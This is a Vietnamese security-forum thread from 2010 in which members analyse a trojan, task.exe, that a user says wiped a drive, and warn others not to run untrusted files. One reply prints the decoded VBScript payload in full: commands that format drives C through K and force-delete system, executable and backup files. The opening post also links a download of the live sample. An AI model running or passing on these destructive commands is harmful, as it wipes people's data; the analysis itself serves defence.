English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Mong mấy anh kiểm tra hộ em cái này là cái gì  XML
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 12/03/2010 10:30:35 (+0700) | #1 | 206686
kjmbialon
Member
[Minus]    0    [Plus]
Joined: 13/01/2010 06:00:57
Messages: 2
Offline
[Profile] [PM]
Thưa mấy anh 2 em bị dính 1 con như sau
Em chạy nó thì nó fomat hết cả ổ D (chứa chương trính con này)
các Phầm mềm như KIS vẫn không phát hiện ra
mong anh em kiểm tra hộ em nó là loại gì mà đểu thế smilie smilie smilie smilie smilie smilie smilie
Down nó nè
http://www.mediafire.com/?zzncer2mtmo
Cẩn thận Click vô 1 cái chết liền đó
[b]
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 12/03/2010 11:02:49 (+0700) | #2 | 206693
[Avatar]
 tutk
Member
[Minus]    0    [Plus]
Joined: 04/05/2007 00:30:18
Messages: 153
Offline
[Profile] [PM]
Ặc ặc, có 1 file task.exe, chạy nó chả thấy gì ngoài một cửa sổ soft không nội dung gì cả, các ổ vẫn bình thường, thế mà la toáng lên: "Cẩn thận Click vô 1 cái chết liền đó" smilie
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 12/03/2010 15:17:33 (+0700) | #3 | 206714
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cái file task.exe này là cậu tạo ra, là tác giả phải không ? task.exe là 1 file RAR SFX. Extract ra có 2 file đính kèm trong đó, cũng là task.exe: Delphi 7 và tasks.exe: Delphi 2006/2007 (pack = ASPack). File tasks.exe chỉ là 1 GUI, vô hại, dùng để load 1 file script lên: BAT, vbs, js. Còn ông nội task.exe kia thì chính là 1 wrapper của sản phẩm ScriptCryptor http://www.abyssmedia.com).
Dưới đây là nội dung file script:
Code:
dim a
set a = wscript.createobject("wscript.ell")
a.run "cmd.exe /c format d: /q /y /x",
a.run "cmd.exe /c format c: /q /y /x",
a.run "cmd.exe /c format e: /q /y /x",
a.run "cmd.exe /c format f: /q /y /x",
a.run "cmd.exe /c format g: /q /y /x",
a.run "cmd.exe /c format h: /q /y /x",
a.run "cmd.exe /c format i: /q /y /x",
a.run "cmd.exe /c format j: /q /y /x",
a.run "cmd.exe /c format k: /q /y /x",
a.run "cmd.exe /c del c:\*.ini /q /s /f"
a.run "cmd.exe /c del c:\*.* /q /f",0'
a.run "cmd.exe /c del d:\*.exe /q /s /f"
a.run "cmd.exe /c del e:\*.exe /q /s /f"
a.run "cmd.exe /c del f:\*.exe /q /s /f"
a.run "cmd.exe /c del g:\*.exe /q /s /f"
a.run "cmd.exe /c del h:\*.exe /q /s /f"
a.run "cmd.exe /c del i:\*.exe /q /s /f"
a.run "cmd.exe /c del j:\*.exe /q /s /f"
a.run "cmd.exe /c del k:\*.exe /q /s /f"
a.run "cmd.exe /c del d:\*.gho /q /s /f"
a.run "cmd.exe /c del e:\*.gho /q /s /f"
a.run "cmd.exe /c del f:\*.gho /q /s /f"
a.run "cmd.exe /c del g:\*.gho /q /s /f"
a.run "cmd.exe /c del h:\*.gho /q /s /f"
a.run "cmd.exe /c del i:\*.gho /q /s /f"
a.run "cmd.exe /c del j:\*.gho /q /s /f"
a.run "cmd.exe /c del k:\*.gho /q /s /f"
a.run "cmd.exe /c del d:\*.sys /q /s /f"
a.run "cmd.exe /c del e:\*.sys /q /s /f"
a.run "cmd.exe /c del f:\*.sys /q /s /f"
a.run "cmd.exe /c del g:\*.sys /q /s /f"
a.run "cmd.exe /c del h:\*.sys /q /s /f"
a.run "cmd.exe /c del i:\*.sys /q /s /f"
a.run "cmd.exe /c del j:\*.sys /q /s /f"
a.run "cmd.exe /c del k:\*.sys /q /s '

Nếu cái này mà là của cậu thì tui đề nghị mod ban nick cậu đấy. Dẹp mấy cái trò phá phách này đi.
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 12/03/2010 15:38:47 (+0700) | #4 | 206716
kjmbialon
Member
[Minus]    0    [Plus]
Joined: 13/01/2010 06:00:57
Messages: 2
Offline
[Profile] [PM]
không phải của em mà nó là cái nì của bọn china nó kêu đây là soft đọc 1 số file trong game nhưng em bị nên mún tìm hỉu
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 28/06/2010 16:18:52 (+0700) | #5 | 214196
hackertam1995
Member
[Minus]    0    [Plus]
Joined: 15/09/2009 19:41:30
Messages: 7
Offline
[Profile] [PM]
cai nay thi cung kho noi lam toan format ca.cung kho khi no la victim thui thong cam
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 09/07/2010 11:35:28 (+0700) | #6 | 214950
[Avatar]
 invalid-password
Member
[Minus]    0    [Plus]
Joined: 09/03/2010 21:22:46
Messages: 161
Offline
[Profile] [PM]
Đây chỉ là 1 cái application thôi chứ có phải virus đâu mà Kasperky nó dò ra ?
Spam thêm một bài là góp một viên gạch xây diễn đàn lớn mạnh
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 21/07/2010 11:36:25 (+0700) | #7 | 215883
casa2007
Member
[Minus]    0    [Plus]
Joined: 06/03/2008 23:13:25
Messages: 14
Offline
[Profile] [PM]

invalid-password wrote:
Đây chỉ là 1 cái application thôi chứ có phải virus đâu mà Kasperky nó dò ra ? 


Virut chả là Application thì là cái gì smilie
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 21/07/2010 13:44:38 (+0700) | #8 | 215896
lehoangcuong
Member
[Minus]    0    [Plus]
Joined: 07/02/2009 22:46:15
Messages: 7
Offline
[Profile] [PM]
Nhìn đoạn mã mà ghê.Format toàn bộ các ổ đĩa.Lúc trước em cũng bị một trường hợp như thế.Thằng bạn gửi cho 1 file có định dạng file nhạc mp3.Không quan sát kĩ,click thế là đi luôn..Ác thiệt.
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 29/07/2010 19:30:30 (+0700) | #9 | 216810
huyannet
Member
[Minus]    0    [Plus]
Joined: 21/07/2008 00:42:51
Messages: 83
Offline
[Profile] [PM]
Xem ra bạn tutk cũng mạo hiểm lắm nên mới nhấp vô file đó,
Có lẽ do code của nó bị sai, không thì bác tutk lảnh đủ rồi, chứ không cười vui như bây giờ. smilie

Đoạn bị sai dấu nháy:
a.run "cmd.exe /c del k:\*.sys /q /s '

Xem ra người viết ra con này chắc cũng đang tập tành, chứ không ai lại phá phách kiểu tai hại vậy đâu.
Cái này mà thêm tính năng lây nhiễm nữa thì chắc vô tù mọt gông. smilie
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 30/07/2010 10:59:34 (+0700) | #10 | 216891
TQN
Elite Member
[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Em copy thiếu mấy ký tự đó đại ca !
[Up] [Print Copy]
  [Question]   Mong mấy anh kiểm tra hộ em cái này là cái gì 30/07/2010 12:34:07 (+0700) | #11 | 216899
[Avatar]
 Z0rr0
Q+WRtaW5pc3RyYXRvc+g
Joined: 14/08/2002 12:52:01
Messages: 1323
Location: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
Hoan nghênh bác TQN kiểm duyệt rất chặt chẽ smilie
Mà trong code đã format còn del chi nữa! Chắc chỉ del được disk C do ko format thành công.

@all: Không nên dại dột mà nhấn vào link hoặc chạy chương trình do bất kì ai đưa ra mà không đủ khả năng xác định mục đích nó làm gì hoặc không đủ cơ sở tin cậy.
Hibernating
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|